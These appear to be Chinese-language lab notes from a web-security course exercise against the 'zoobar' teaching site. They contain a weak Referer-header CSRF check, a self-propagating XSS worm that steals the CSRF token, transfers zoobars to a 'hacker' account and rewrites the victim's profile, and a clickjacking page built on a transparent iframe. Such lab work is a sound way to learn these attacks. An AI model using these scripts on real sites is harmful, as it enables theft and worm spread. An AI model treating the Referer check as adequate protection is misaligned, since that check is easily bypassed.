信息安全实践：CSRF & XSS & Click Jacking

CSRF

防御

Refer

/* 在 transfer.php 中添加 */
echo $_SERVER['HTTP_REFERER'];
if ($_SERVER['HTTP_REFERER'] != "http://myzoo.com/transfer.php") {
    echo "transfer fail";
  }else{
    echo "transfer pass";
}

XSS

蠕虫

<span id=hack>
<script>
	/* 获得 token */
	var a = new XMLHttpRequest();
	var t, context;
	a.onreadystatechange = function() {
		if(a.readyState == 4) {
			context = (a.responseText);
			/* token 的 id 为 csrf */
			alert(context.substr(context.indexOf("csrf")+24, 32))
			t = context.substr(context.indexOf("csrf")+24, 32);
		}
	};
	a.open("GET", "transfer.php", false);
	a.send()

	/* 偷取 zoobar */
	var b = new XMLHttpRequest();
	b.open("POST", "transfer.php", true);
	b.setRequestHeader("content-type", "application/x-www-form-urlencoded");
	w = "zoobars=1&recipient=hacker&submission=Send&csrf="+t;
	b.send(w);
	
	/* 蠕虫，篡改 profile */
	var c = new XMLHttpRequest();
        c.open("POST", "index.php", true);
        c.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        str =  "<span id=hack>" +  document.getElementById("hack").innerHTML + "</span>";
        str = encodeURIComponent(str);
        w = "profile_submit=Save&profile_update=" + str;
        c.send(w);
</script>
</span>

Click Jacking

<!DOCTYPE html>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<head>
    <title>click attack</title>
    <style>
    iframe {
	width: 600px;
        height: 450px;
	position: absolute; /* 只有 position 为非 static 时 z-index 才能起作用 */
        top: -0px;
        left: -0px;
        z-index: 2;
        -moz-opacity: 0; /* 兼容，同 opacity */
	filter: alpha(opacity=0); /* 兼容 IE8 以下的 IE 浏览器，同 opacity，filter为 IE 特有 */
        opacity: 0;
    }
    button {
        position: absolute;
        top: 350px;
        left: 170px;
        z-index: -1;
        width: 75px;
        height:30px;
    }
   </style>
</head>
<body>
    <iframe name="real" src="http:www.myzoo.com/transfer.php"> </iframe>
    <button>click!</button>
</body>
</html>